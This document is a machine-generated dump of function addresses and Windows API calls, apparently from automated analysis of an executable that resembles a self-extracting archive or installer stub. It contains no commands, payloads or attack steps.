24542->24537 24542->24539 24542->24541 24545 cf3d41 24548 cf3dd7 24545->24548 24549 cf3dc7 24545->24549 24592 d03020 123 API calls 24548->24592 24572 cf9215 24549->24572 24552 cf3dd5 24552->24554 24593 cf2021 74 API calls 24552->24593 24594 d02297 24554->24594 24555->24515 24556->24517 24557->24513 24559 d0338c 24558->24559 24561 d03396 ___std_exception_copy 24558->24561 24601 cf6ca7 75 API calls 24559->24601 24562 d034c6 24561->24562 24563 d0341c 24561->24563 24567 d03440 __cftof 24561->24567 24603 d1238d RaiseException 24562->24603 24602 d032aa 75 API calls 3 library calls 24563->24602 24566 d034f2 24567->24542 24569 cfab28 24568->24569 24571 cfab32 24568->24571 24570 d0eb38 8 API calls 24569->24570 24570->24571 24571->24545 24573 cf921f __EH_prolog 24572->24573 24604 cf7c64 24573->24604 24576 cf13ba 78 API calls 24577 cf9231 24576->24577 24607 cfd114 24577->24607 24579 cf928a 24579->24552 24581 cfd114 118 API calls 24582 cf9243 24581->24582 24582->24579 24582->24581 24616 cfd300 97 API calls __InternalCxxFrameHandler 24582->24616 24583->24534 24584->24554 24585->24537 24587 cfd084 24586->24587 24588 cfd072 24586->24588 24618 cf603a 82 API calls 24587->24618 24617 cf603a 82 API calls 24588->24617 24591 cfd07c 24591->24538 24592->24552 24593->24554 24595 d022a1 24594->24595 24596 d022ba 24595->24596 24599 d022ce 24595->24599 24619 d00eed 86 API calls 24596->24619 24598 d022c1 24598->24599 24600->24534 24601->24561 24602->24567 24603->24566 24605 cfb146 GetVersionExW 24604->24605 24606 cf7c69 24605->24606 24606->24576 24613 cfd12a __InternalCxxFrameHandler 24607->24613 24608 cfd29a 24609 cfd2ce 24608->24609 24610 cfd0cb 6 API calls 24608->24610 24611 d00e08 SetThreadExecutionState RaiseException 24609->24611 24610->24609 24614 cfd291 24611->24614 24612 d08c8d 103 API calls 24612->24613 24613->24608 24613->24612 24613->24614 24615 cfac05 91 API calls 24613->24615 24614->24582 24615->24613 24616->24582 24617->24591 24618->24591 24619->24598 24620->24347 24621->24347 24622->24344 24624 cf5d2a 24623->24624 24670 cf5c4b 24624->24670 24627 cf5d5d 24628 cf5d95 24627->24628 24675 cfb1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24627->24675 24628->24361 24630 cf8186 24629->24630 24631 cf8232 24630->24631 24682 cfbe5e 19 API calls __InternalCxxFrameHandler 24630->24682 24681 d01fac CharUpperW 24631->24681 24634 cf823b 24634->24364 24636 cf7c22 24635->24636 24637 cf7c5a 24636->24637 24683 cf6e7a 74 API calls 24636->24683 24637->24375 24639 cf7c52 24684 cf138b 74 API calls 24639->24684 24641->24427 24643 cf9db3 24642->24643 24646 cf9dc2 24642->24646 24644 cf9db9 FlushFileBuffers 24643->24644 24643->24646 24644->24646 24645 cf9e3f SetFileTime 24645->24433 24646->24645 24647->24354 24648->24365 24649->24365 24650->24375 24651->24375 24652->24372 24653->24377 24654->24385 24655->24377 24657 cf98c5 GetFileType 24656->24657 24658 cf8b5a 24656->24658 24657->24658 24658->24382 24659 cf2021 74 API calls 24658->24659 24659->24396 24660->24382 24661->24398 24662->24423 24663->24423 24664->24423 24665->24423 24666->24423 24667->24429 24668->24436 24669->24426 24676 cf5b48 24670->24676 24672 cf5c6c 24672->24627 24674 cf5b48 2 API calls 24674->24672 24675->24627 24678 cf5b52 24676->24678 24677 cf5c3a 24677->24672 24677->24674 24678->24677 24680 cfb1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24678->24680 24680->24678 24681->24634 24682->24631 24683->24639 24684->24637 24686 cfcef2 24685->24686 24691 cfa99e 86 API calls 24686->24691 24688 cfcf24 24692 cfa99e 86 API calls 24688->24692 24690 cfcf2f 24691->24688 24692->24690 24693->24445 24695 cfa6a8 24694->24695 24696 cfa727 FindNextFileW 24695->24696 24697 cfa6c1 FindFirstFileW 24695->24697 24699 cfa732 GetLastError 24696->24699 24704 cfa709 24696->24704 24698 cfa6d0 24697->24698 24697->24704 24700 cfbb03 GetCurrentDirectoryW 24698->24700 24699->24704 24701 cfa6e0 24700->24701 24702 cfa6fe GetLastError 24701->24702 24703 cfa6e4 FindFirstFileW 24701->24703 24702->24704 24703->24702 24703->24704 24704->24299 24714 d0a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24705->24714 24707 d0a5cd 24708 d0a5d9 24707->24708 24715 d0a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24707->24715 24708->24097 24708->24099 24710->24098 24711->24107 24712->24107 24713->24110 24714->24707 24715->24708 24716->24118 24718 cf9f42 78 API calls 24717->24718 24719 cf1fe8 24718->24719 24720 cf1a04 101 API calls 24719->24720 24722 cf2005 24719->24722 24721 cf1ff5 24720->24721 24721->24722 24724 cf138b 74 API calls 24721->24724 24722->24126 24722->24127 24724->24722 25389 d094e0 GetClientRect 25390 d0f2e0 46 API calls __RTC_Initialize 25441 d021e0 26 API calls std::bad_exception::bad_exception 25391 d1bee0 GetCommandLineA GetCommandLineW 24739 d0eae7 24740 d0eaf1 24739->24740 24741 d0e85d ___delayLoadHelper2@8 14 API calls 24740->24741 24742 d0eafe 24741->24742 25392 d0f4e7 29 API calls _abort 25394 cf5ef0 82 API calls 25443 cf95f0 80 API calls 25445 d09580 6 API calls 25396 d0c793 102 API calls 4 library calls 25398 d0c793 97 API calls 4 library calls 25449 d0b18d 78 API calls 25450 d0b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24923 d0f3b2 24924 d0f3be ___scrt_is_nonwritable_in_current_image 24923->24924 24955 d0eed7 24924->24955 24926 d0f3c5 24927 d0f518 24926->24927 24930 d0f3ef 24926->24930 25028 d0f838 4 API calls 2 library calls 24927->25028 24929 d0f51f 25021 d17f58 24929->25021 24942 d0f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24930->24942 24966 d18aed 24930->24966 24937 d0f40e 24939 d0f48f 24974 d0f953 GetStartupInfoW __cftof 24939->24974 24941 d0f495 24975 d18a3e 51 API calls 24941->24975 24942->24939 25024 d17af4 38 API calls _abort 24942->25024 24945 d0f49d 24976 d0df1e 24945->24976 24949 d0f4b1 24949->24929 24950 d0f4b5 24949->24950 24951 d0f4be 24950->24951 25026 d17efb 28 API calls _abort 24950->25026 25027 d0f048 12 API calls ___scrt_uninitialize_crt 24951->25027 24954 d0f4c6 24954->24937 24956 d0eee0 24955->24956 25030 d0f654 IsProcessorFeaturePresent 24956->25030 24958 d0eeec 25031 d12a5e 24958->25031 24960 d0eef1 24961 d0eef5 24960->24961 25039 d18977 24960->25039 24961->24926 24964 d0ef0c 24964->24926 24967 d18b04 24966->24967 24968 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24967->24968 24969 d0f408 24968->24969 24969->24937 24970 d18a91 24969->24970 24971 d18ac0 24970->24971 24972 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24971->24972 24973 d18ae9 24972->24973 24973->24942 24974->24941 24975->24945 25090 d00863 24976->25090 24980 d0df3d 25139 d0ac16 24980->25139 24982 d0df46 __cftof 24983 d0df59 GetCommandLineW 24982->24983 24984 d0dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24983->24984 24985 d0df68 24983->24985 24986 cf4092 _swprintf 51 API calls 24984->24986 25143 d0c5c4 24985->25143 24988 d0e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24986->24988 25154 d0b6dd LoadBitmapW 24988->25154 24991 d0dfe0 25148 d0dbde 24991->25148 24992 d0df76 OpenFileMappingW 24995 d0dfd6 CloseHandle 24992->24995 24996 d0df8f MapViewOfFile 24992->24996 24995->24984 24997 d0dfa0 __InternalCxxFrameHandler 24996->24997 24998 d0dfcd UnmapViewOfFile 24996->24998 25003 d0dbde 2 API calls 24997->25003 24998->24995 25005 d0dfbc 25003->25005 25004 d090b7 8 API calls 25006 d0e0aa DialogBoxParamW 25004->25006 25005->24998 25007 d0e0e4 25006->25007 25008 d0e0f6 Sleep 25007->25008 25009 d0e0fd 25007->25009 25008->25009 25012 d0e10b 25009->25012 25184 d0ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 25009->25184 25011 d0e12a DeleteObject 25013 d0e146 25011->25013 25014 d0e13f DeleteObject 25011->25014 25012->25011 25015 d0e177 25013->25015 25017 d0e189 25013->25017 25014->25013 25185 d0dc3b 6 API calls 25015->25185 25181 d0ac7c 25017->25181 25019 d0e17d CloseHandle 25019->25017 25020 d0e1c3 25025 d0f993 GetModuleHandleW 25020->25025 25317 d17cd5 25021->25317 25024->24939 25025->24949 25026->24951 25027->24954 25028->24929 25030->24958 25043 d13b07 25031->25043 25035 d12a6f 25036 d12a7a 25035->25036 25057 d13b43 DeleteCriticalSection 25035->25057 25036->24960 25038 d12a67 25038->24960 25086 d1c05a 25039->25086 25042 d12a7d 7 API calls 2 library calls 25042->24961 25044 d13b10 25043->25044 25046 d13b39 25044->25046 25048 d12a63 25044->25048 25058 d13d46 25044->25058 25063 d13b43 DeleteCriticalSection 25046->25063 25048->25038 25049 d12b8c 25048->25049 25079 d13c57 25049->25079 25052 d12ba1 25052->25035 25054 d12baf 25055 d12bbc 25054->25055 25085 d12bbf 6 API calls ___vcrt_FlsFree 25054->25085 25055->25035 25057->25038 25064 d13c0d 25058->25064 25061 d13d7e InitializeCriticalSectionAndSpinCount 25062 d13d69 25061->25062 25062->25044 25063->25048 25065 d13c4f 25064->25065 25066 d13c26 25064->25066 25065->25061 25065->25062 25066->25065 25071 d13b72 25066->25071 25069 d13c3b GetProcAddress 25069->25065 25070 d13c49 25069->25070 25070->25065 25076 d13b7e ___vcrt_InitializeCriticalSectionEx 25071->25076 25072 d13b95 LoadLibraryExW 25074 d13bb3 GetLastError 25072->25074 25075 d13bfa 25072->25075 25073 d13bf3 25073->25065 25073->25069 25074->25076 25075->25073 25077 d13c02 FreeLibrary 25075->25077 25076->25072 25076->25073 25078 d13bd5 LoadLibraryExW 25076->25078 25077->25073 25078->25075 25078->25076 25080 d13c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 25079->25080 25081 d13c71 25080->25081 25082 d13c8a TlsAlloc 25081->25082 25083 d12b96 25081->25083 25083->25052 25084 d13d08 6 API calls ___vcrt_InitializeCriticalSectionEx 25083->25084 25084->25054 25085->25052 25089 d1c073 25086->25089 25087 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25088 d0eefe 25087->25088 25088->24964 25088->25042 25089->25087 25091 d0ec50 25090->25091 25092 d0086d GetModuleHandleW 25091->25092 25093 d008e7 25092->25093 25094 d00888 GetProcAddress 25092->25094 25095 d00c14 GetModuleFileNameW 25093->25095 25195 d175fb 42 API calls 2 library calls 25093->25195 25096 d008a1 25094->25096 25097 d008b9 GetProcAddress 25094->25097 25106 d00c32 25095->25106 25096->25097 25099 d008cb 25097->25099 25099->25093 25100 d00b54 25100->25095 25101 d00b5f GetModuleFileNameW CreateFileW 25100->25101 25102 d00c08 CloseHandle 25101->25102 25103 d00b8f SetFilePointer 25101->25103 25102->25095 25103->25102 25104 d00b9d ReadFile 25103->25104 25104->25102 25108 d00bbb 25104->25108 25109 d00c94 GetFileAttributesW 25106->25109 25110 d00cac 25106->25110 25112 d00c5d CompareStringW 25106->25112 25186 cfb146 25106->25186 25189 d0081b 25106->25189 25108->25102 25111 d0081b 2 API calls 25108->25111 25109->25106 25109->25110 25113 d00cb7 25110->25113 25116 d00cec 25110->25116 25111->25108 25112->25106 25115 d00cd0 GetFileAttributesW 25113->25115 25117 d00ce8 25113->25117 25114 d00dfb 25138 d0a64d GetCurrentDirectoryW 25114->25138 25115->25113 25115->25117 25116->25114 25118 cfb146 GetVersionExW 25116->25118 25117->25116 25119 d00d06 25118->25119 25120 d00d73 25119->25120 25121 d00d0d 25119->25121 25123 cf4092 _swprintf 51 API calls 25120->25123 25122 d0081b 2 API calls 25121->25122 25125 d00d17 25122->25125 25124 d00d9b AllocConsole 25123->25124 25126 d00df3 ExitProcess 25124->25126 25127 d00da8 GetCurrentProcessId AttachConsole 25124->25127 25128 d0081b 2 API calls 25125->25128 25196 d13e13 25127->25196 25130 d00d21 25128->25130 25132 cfe617 53 API calls 25130->25132 25131 d00dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25131->25126 25133 d00d3c 25132->25133 25134 cf4092 _swprintf 51 API calls 25133->25134 25135 d00d4f 25134->25135 25136 cfe617 53 API calls 25135->25136 25137 d00d5e 25136->25137 25137->25126 25138->24980 25140 d0081b 2 API calls 25139->25140 25141 d0ac2a OleInitialize 25140->25141 25142 d0ac4d GdiplusStartup SHGetMalloc 25141->25142 25142->24982 25144 d0c5ce 25143->25144 25145 d0c6e4 25144->25145 25146 d01fac CharUpperW 25144->25146 25198 cff3fa 82 API calls 2 library calls 25144->25198 25145->24991 25145->24992 25146->25144 25149 d0ec50 25148->25149 25150 d0dbeb SetEnvironmentVariableW 25149->25150 25151 d0dc0e 25150->25151 25152 d0dc36 25151->25152 25153 d0dc2a SetEnvironmentVariableW 25151->25153 25152->24984 25153->25152 25155 d0b70b GetObjectW 25154->25155 25156 d0b6fe 25154->25156 25158 d0b71a 25155->25158 25199 d0a6c2 FindResourceW 25156->25199 25160 d0a5c6 4 API calls 25158->25160 25162 d0b72d 25160->25162 25161 d0b770 25173 cfda42 25161->25173 25162->25161 25163 d0b74c 25162->25163 25164 d0a6c2 13 API calls 25162->25164 25215 d0a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25163->25215 25166 d0b73d 25164->25166 25166->25163 25169 d0b743 DeleteObject 25166->25169 25167 d0b754 25216 d0a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25167->25216 25169->25163 25170 d0b75d 25217 d0a80c 8 API calls 25170->25217 25172 d0b764 DeleteObject 25172->25161 25226 cfda67 25173->25226 25178 d090b7 25179 d0eb38 8 API calls 25178->25179 25180 d090d6 25179->25180 25180->25004 25182 d0acab GdiplusShutdown CoUninitialize 25181->25182 25182->25020 25184->25012 25185->25019 25187 cfb15a GetVersionExW 25186->25187 25188 cfb196 25186->25188 25187->25188 25188->25106 25190 d0ec50 25189->25190 25191 d00828 GetSystemDirectoryW 25190->25191 25192 d00840 25191->25192 25193 d0085e 25191->25193 25194 d00851 LoadLibraryW 25192->25194 25193->25106 25194->25193 25195->25100 25197 d13e1b 25196->25197 25197->25131 25197->25197 25198->25144 25200 d0a6e5 SizeofResource 25199->25200 25201 d0a7d3 25199->25201 25200->25201 25202 d0a6fc LoadResource 25200->25202 25201->25155 25201->25158 25202->25201 25203 d0a711 LockResource 25202->25203 25203->25201 25204 d0a722 GlobalAlloc 25203->25204 25204->25201 25205 d0a73d GlobalLock 25204->25205 25206 d0a7cc GlobalFree 25205->25206 25207 d0a74c __InternalCxxFrameHandler 25205->25207 25206->25201 25208 d0a754 CreateStreamOnHGlobal 25207->25208 25209 d0a7c5 GlobalUnlock 25208->25209 25210 d0a76c 25208->25210 25209->25206 25218 d0a626 GdipAlloc 25210->25218 25213 d0a7b0 25213->25209 25214 d0a79a GdipCreateHBITMAPFromBitmap 25214->25213 25215->25167 25216->25170 25217->25172 25219 d0a645 25218->25219 25220 d0a638 25218->25220 25219->25209 25219->25213 25219->25214 25222 d0a3b9 25220->25222 25223 d0a3e1 GdipCreateBitmapFromStream 25222->25223 25224 d0a3da GdipCreateBitmapFromStreamICM 25222->25224 25225 d0a3e6 25223->25225 25224->25225 25225->25219 25227 cfda75 __EH_prolog 25226->25227 25228 cfdaa4 GetModuleFileNameW 25227->25228 25229 cfdad5 25227->25229 25230 cfdabe 25228->25230 25272 cf98e0 25229->25272 25230->25229 25232 cfdb31 25283 d16310 25232->25283 25233 cf959a 80 API calls 25234 cfda4e 25233->25234 25270 cfe29e GetModuleHandleW FindResourceW 25234->25270 25236 cfdb05 25236->25232 25238 cfe261 78 API calls 25236->25238 25250 cfdd4a 25236->25250 25237 cfdb44 25239 d16310 26 API calls 25237->25239 25238->25236 25247 cfdb56 ___vcrt_InitializeCriticalSectionEx 25239->25247 25240 cfdc85 25240->25250 25303 cf9d70 81 API calls 25240->25303 25241 cf9e80 79 API calls 25241->25247 25244 cfdc9f ___std_exception_copy 25245 cf9bd0 82 API calls 25244->25245 25244->25250 25248 cfdcc8 ___std_exception_copy 25245->25248 25247->25240 25247->25241 25247->25250 25297 cf9bd0 25247->25297 25302 cf9d70 81 API calls 25247->25302 25248->25250 25268 cfdcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25248->25268 25304 d01b84 MultiByteToWideChar 25248->25304 25250->25233 25251 cfe159 25256 cfe1de 25251->25256 25310 d18cce 26 API calls ___std_exception_copy 25251->25310 25254 cfe16e 25311 d17625 26 API calls ___std_exception_copy 25254->25311 25255 cfe1c6 25312 cfe27c 78 API calls 25255->25312 25257 cfe214 25256->25257 25262 cfe261 78 API calls 25256->25262 25260 d16310 26 API calls 25257->25260 25261 cfe22d 25260->25261 25263 d16310 26 API calls 25261->25263 25262->25256 25263->25250 25265 d01da7 WideCharToMultiByte 25265->25268 25268->25250 25268->25251 25268->25265 25305 cfe5b1 50 API calls __vsnprintf 25268->25305 25306 d16159 26 API calls 3 library calls 25268->25306 25307 d18cce 26 API calls ___std_exception_copy 25268->25307 25308 d17625 26 API calls ___std_exception_copy 25268->25308 25309 cfe27c 78 API calls 25268->25309 25271 cfda55 25270->25271 25271->25178 25274 cf98ea 25272->25274 25273 cf994b CreateFileW 25275 cf996c GetLastError 25273->25275 25279 cf99bb 25273->25279 25274->25273 25276 cfbb03 GetCurrentDirectoryW 25275->25276 25277 cf998c 25276->25277 25278 cf9990 CreateFileW GetLastError 25277->25278 25277->25279 25278->25279 25281 cf99b5 25278->25281 25280 cf99ff 25279->25280 25282 cf99e5 SetFileTime 25279->25282 25280->25236 25281->25279 25282->25280 25284 d16349 25283->25284 25285 d1634d 25284->25285 25296 d16375 25284->25296 25313 d191a8 20 API calls __dosmaperr 25285->25313 25287 d16699 25289 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25287->25289 25288 d16352 25314 d19087 26 API calls ___std_exception_copy 25288->25314 25291 d166a6 25289->25291 25291->25237 25292 d1635d 25293 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25292->25293 25294 d16369 25293->25294 25294->25237 25296->25287 25315 d16230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25296->25315 25298 cf9bdc 25297->25298 25299 cf9be3 25297->25299 25298->25247 25299->25298 25301 cf9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25299->25301 25316 cf6d1a 77 API calls 25299->25316 25301->25299 25302->25247 25303->25244 25304->25268 25305->25268 25306->25268 25307->25268 25308->25268 25309->25268 25310->25254 25311->25255 25312->25256 25313->25288 25314->25292 25315->25296 25316->25299 25318 d17ce1 _abort 25317->25318 25319 d17ce8 25318->25319 25320 d17cfa 25318->25320 25353 d17e2f GetModuleHandleW 25319->25353 25341 d1ac31 EnterCriticalSection 25320->25341 25323 d17ced 25323->25320 25354 d17e73 GetModuleHandleExW 25323->25354 25327 d17d76 25331 d17d8e 25327->25331 25336 d18a91 _abort 5 API calls 25327->25336 25329 d17de8 25363 d22390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25329->25363 25330 d17dbc 25345 d17dee 25330->25345 25337 d18a91 _abort 5 API calls 25331->25337 25332 d17d01 25332->25327 25339 d17d9f 25332->25339 25362 d187e0 20 API calls _abort 25332->25362 25336->25331 25337->25339 25342 d17ddf 25339->25342 25341->25332 25364 d1ac81 LeaveCriticalSection 25342->25364 25344 d17db8 25344->25329 25344->25330 25365 d1b076 25345->25365 25348 d17e1c 25351 d17e73 _abort 8 API calls 25348->25351 25349 d17dfc GetPEB 25349->25348 25350 d17e0c GetCurrentProcess TerminateProcess 25349->25350 25350->25348 25352 d17e24 ExitProcess 25351->25352 25353->25323 25355 d17ec0 25354->25355 25356 d17e9d GetProcAddress 25354->25356 25358 d17ec6 FreeLibrary 25355->25358 25359 d17ecf 25355->25359 25357 d17eb2 25356->25357 25357->25355 25358->25359 25360 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25359->25360 25361 d17cf9 25360->25361 25361->25320 25362->25327 25364->25344 25366 d1b09b 25365->25366 25370 d1b091 25365->25370 25367 d1ac98 _abort 5 API calls 25366->25367 25367->25370 25368 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25369 d17df8 25368->25369 25369->25348 25369->25349 25370->25368 25452 cf6faa 111 API calls 3 library calls 25453 d1b1b8 27 API calls 2 library calls 25454 d01bbd GetCPInfo IsDBCSLeadByte 25455 d0f3a0 27 API calls 25401 d1a4a0 71 API calls _free 25402 d0dca1 DialogBoxParamW 25403 d1a6a0 31 API calls 2 library calls 25404 d208a0 IsProcessorFeaturePresent 25456 d0eda7 48 API calls _unexpected 25407 d0e455 14 API calls ___delayLoadHelper2@8 23535 d0cd58 23536 d0ce22 23535->23536 23542 d0cd7b 23535->23542 23546 d0c793 _wcslen _wcsrchr 23536->23546 23563 d0d78f 23536->23563 23539 d0d40a 23540 d01fbb CompareStringW 23540->23542 23542->23536 23542->23540 23543 d0ca67 SetWindowTextW 23543->23546 23546->23539 23546->23543 23549 d0c855 SetFileAttributesW 23546->23549 23554 d0cc31 GetDlgItem SetWindowTextW SendMessageW 23546->23554 23557 d0cc71 SendMessageW 23546->23557 23562 d01fbb CompareStringW 23546->23562 23587 d0b314 23546->23587 23591 d0a64d GetCurrentDirectoryW 23546->23591 23596 cfa5d1 6 API calls 23546->23596 23597 cfa55a FindClose 23546->23597 23598 d0b48e 76 API calls 2 library calls 23546->23598 23599 d13e3e 23546->23599 23550 d0c90f GetFileAttributesW 23549->23550 23561 d0c86f __cftof _wcslen 23549->23561 23550->23546 23552 d0c921 DeleteFileW 23550->23552 23552->23546 23555 d0c932 23552->23555 23554->23546 23593 cf4092 23555->23593 23557->23546 23559 d0c967 MoveFileW 23559->23546 23560 d0c97f MoveFileExW 23559->23560 23560->23546 23561->23546 23561->23550 23592 cfb991 51 API calls 2 library calls 23561->23592 23562->23546 23564 d0d799 __cftof _wcslen 23563->23564 23565 d0d9c0 23564->23565 23566 d0d8a5 23564->23566 23567 d0d9e7 23564->23567 23615 d01fbb CompareStringW 23564->23615 23565->23567 23570 d0d9de ShowWindow 23565->23570 23612 cfa231 23566->23612 23567->23546 23570->23567 23572 d0d8d9 ShellExecuteExW 23572->23567 23579 d0d8ec 23572->23579 23574 d0d8d1 23574->23572 23575 d0d925 23617 d0dc3b 6 API calls 23575->23617 23576 d0d97b CloseHandle 23577 d0d994 23576->23577 23578 d0d989 23576->23578 23577->23565 23618 d01fbb CompareStringW 23578->23618 23579->23575 23579->23576 23581 d0d91b ShowWindow 23579->23581 23581->23575 23583 d0d93d 23583->23576 23584 d0d950 GetExitCodeProcess 23583->23584 23584->23576 23585 d0d963 23584->23585 23585->23576 23588 d0b31e 23587->23588 23589 d0b3f0 ExpandEnvironmentStringsW 23588->23589 23590 d0b40d 23588->23590 23589->23590 23590->23546 23591->23546 23592->23561 23633 cf4065 23593->23633 23596->23546 23597->23546 23598->23546 23600 d18e54 23599->23600 23601 d18e61 23600->23601 23602 d18e6c 23600->23602 23713 d18e06 23601->23713 23604 d18e74 23602->23604 23610 d18e7d _abort 23602->23610 23607 d18dcc _free 20 API calls 23604->23607 23605 d18e82 23720 d191a8 20 API calls __dosmaperr 23605->23720 23606 d18ea7 HeapReAlloc 23609 d18e69 23606->23609 23606->23610 23607->23609 23609->23546 23610->23605 23610->23606 23721 d17a5e 7 API calls 2 library calls 23610->23721 23619 cfa243 23612->23619 23615->23566 23616 cfb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23616->23574 23617->23583 23618->23577 23627 d0ec50 23619->23627 23622 cfa23a 23622->23572 23622->23616 23623 cfa261 23629 cfbb03 23623->23629 23625 cfa275 23625->23622 23626 cfa279 GetFileAttributesW 23625->23626 23626->23622 23628 cfa250 GetFileAttributesW 23627->23628 23628->23622 23628->23623 23630 cfbb10 _wcslen 23629->23630 23631 cfbbb8 GetCurrentDirectoryW 23630->23631 23632 cfbb39 _wcslen 23630->23632 23631->23632 23632->23625 23634 cf407c __vsnwprintf_l 23633->23634 23637 d15fd4 23634->23637 23640 d14097 23637->23640 23641 d140d7 23640->23641 23642 d140bf 23640->23642 23641->23642 23644 d140df 23641->23644 23657 d191a8 20 API calls __dosmaperr 23642->23657 23659 d14636 23644->23659 23646 d140c4 23658 d19087 26 API calls ___std_exception_copy 23646->23658 23649 d140cf 23670 d0fbbc 23649->23670 23652 d14167 23668 d149e6 51 API calls 4 library calls 23652->23668 23653 cf4086 GetFileAttributesW 23653->23555 23653->23559 23656 d14172 23669 d146b9 20 API calls _free 23656->23669 23657->23646 23658->23649 23660 d14653 23659->23660 23666 d140ef 23659->23666 23660->23666 23677 d197e5 GetLastError 23660->23677 23662 d14674 23698 d1993a 38 API calls __fassign 23662->23698 23664 d1468d 23699 d19967 38 API calls __fassign 23664->23699 23667 d14601 20 API calls 2 library calls 23666->23667 23667->23652 23668->23656 23669->23649 23671 d0fbc4 23670->23671 23672 d0fbc5 IsProcessorFeaturePresent 23670->23672 23671->23653 23674 d0fc07 23672->23674 23712 d0fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23674->23712 23676 d0fcea 23676->23653 23678 d19807 23677->23678 23679 d197fb 23677->23679 23701 d1b136 20 API calls 2 library calls 23678->23701 23700 d1ae5b 11 API calls 2 library calls 23679->23700 23682 d19801 23682->23678 23684 d19850 SetLastError 23682->23684 23683 d19813 23685 d1981b 23683->23685 23708 d1aeb1 11 API calls 2 library calls 23683->23708 23684->23662 23702 d18dcc 23685->23702 23688 d19830 23688->23685 23690 d19837 23688->23690 23689 d19821 23692 d1985c SetLastError 23689->23692 23709 d19649 20 API calls _abort 23690->23709 23710 d18d24 38 API calls _abort 23692->23710 23693 d19842 23695 d18dcc _free 20 API calls 23693->23695 23697 d19849 23695->23697 23697->23684 23697->23692 23698->23664 23699->23666 23700->23682 23701->23683 23703 d18dd7 RtlFreeHeap 23702->23703 23707 d18e00 _free 23702->23707 23704 d18dec 23703->23704 23703->23707 23711 d191a8 20 API calls __dosmaperr 23704->23711 23706 d18df2 GetLastError 23706->23707 23707->23689 23708->23688 23709->23693 23711->23706 23712->23676 23714 d18e44 23713->23714 23718 d18e14 _abort 23713->23718 23723 d191a8 20 API calls __dosmaperr 23714->23723 23716 d18e2f RtlAllocateHeap 23717 d18e42 23716->23717 23716->23718 23717->23609 23718->23714 23718->23716 23722 d17a5e 7 API calls 2 library calls 23718->23722 23720->23609 23721->23610 23722->23718 23723->23717 25410 d0a440 GdipCloneImage GdipAlloc 25411 d13a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25460 d21f40 CloseHandle 23800 d0e44b 23801 d0e3f4 23800->23801 23801->23800 23802 d0e85d ___delayLoadHelper2@8 14 API calls 23801->23802 23802->23801 25412 d0a070 10 API calls 25414 d0b270 99 API calls 24726 cf9f7a 24727 cf9f8f 24726->24727 24728 cf9f88 24726->24728 24729 cf9f9c GetStdHandle 24727->24729 24733 cf9fab 24727->24733 24729->24733 24730 cfa003 WriteFile 24730->24733 24731 cf9fcf 24732 cf9fd4 WriteFile 24731->24732 24731->24733 24732->24731 24732->24733 24733->24728 24733->24730 24733->24731 24733->24732 24735 cfa095 24733->24735 24737 cf6baa 78 API calls 24733->24737 24738 cf6e98 77 API calls 24735->24738 24737->24733 24738->24728 24743 d0e569 24745 d0e517 24743->24745 24744 d0e85d ___delayLoadHelper2@8 14 API calls 24744->24745 24745->24744 24746 d18268 24757 d1bb30 24746->24757 24752 d18dcc _free 20 API calls 24753 d182ba 24752->24753 24754 d18290 24755 d18dcc _free 20 API calls 24754->24755 24756 d18285 24755->24756 24756->24752 24758 d1bb39 24757->24758 24759 d1827a 24757->24759 24774 d1ba27 24758->24774 24761 d1bf30 GetEnvironmentStringsW 24759->24761 24762 d1bf47 24761->24762 24772 d1bf9a 24761->24772 24765 d1bf4d WideCharToMultiByte 24762->24765 24763 d1bfa3 FreeEnvironmentStringsW 24764 d1827f 24763->24764 24764->24756 24773 d182c0 26 API calls 3 library calls 24764->24773 24766 d1bf69 24765->24766 24765->24772 24767 d18e06 __vswprintf_c_l 21 API calls 24766->24767 24768 d1bf6f 24767->24768 24769 d1bf76 WideCharToMultiByte 24768->24769 24770 d1bf8c 24768->24770 24769->24770 24771 d18dcc _free 20 API calls 24770->24771 24771->24772 24772->24763 24772->24764 24773->24754 24775 d197e5 _abort 38 API calls 24774->24775 24776 d1ba34 24775->24776 24794 d1bb4e 24776->24794 24778 d1ba3c 24803 d1b7bb 24778->24803 24781 d1ba53 24781->24759 24782 d18e06 __vswprintf_c_l 21 API calls 24783 d1ba64 24782->24783 24784 d1ba96 24783->24784 24810 d1bbf0 24783->24810 24787 d18dcc _free 20 API calls 24784->24787 24787->24781 24788 d1ba91 24820 d191a8 20 API calls __dosmaperr 24788->24820 24790 d1bada 24790->24784 24821 d1b691 26 API calls 24790->24821 24791 d1baae 24791->24790 24792 d18dcc _free 20 API calls 24791->24792 24792->24790 24795 d1bb5a ___scrt_is_nonwritable_in_current_image 24794->24795 24796 d197e5 _abort 38 API calls 24795->24796 24801 d1bb64 24796->24801 24798 d1bbe8 _abort 24798->24778 24801->24798 